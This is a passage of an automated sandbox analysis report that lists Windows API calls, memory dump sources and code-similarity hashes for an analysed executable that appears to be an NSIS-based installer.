                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                              • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                            • SetFilePointer.KERNELBASE(00166248,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer$CountTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092082344-0
                                                                                                            • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                            • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                            • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00721EA0), ref: 00401BE7
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3394109436-1824292864
                                                                                                            • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                            • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                            • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                            • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 397863658-0
                                                                                                            • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                            • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                            • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                              • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1892508949-0
                                                                                                            • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                            • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
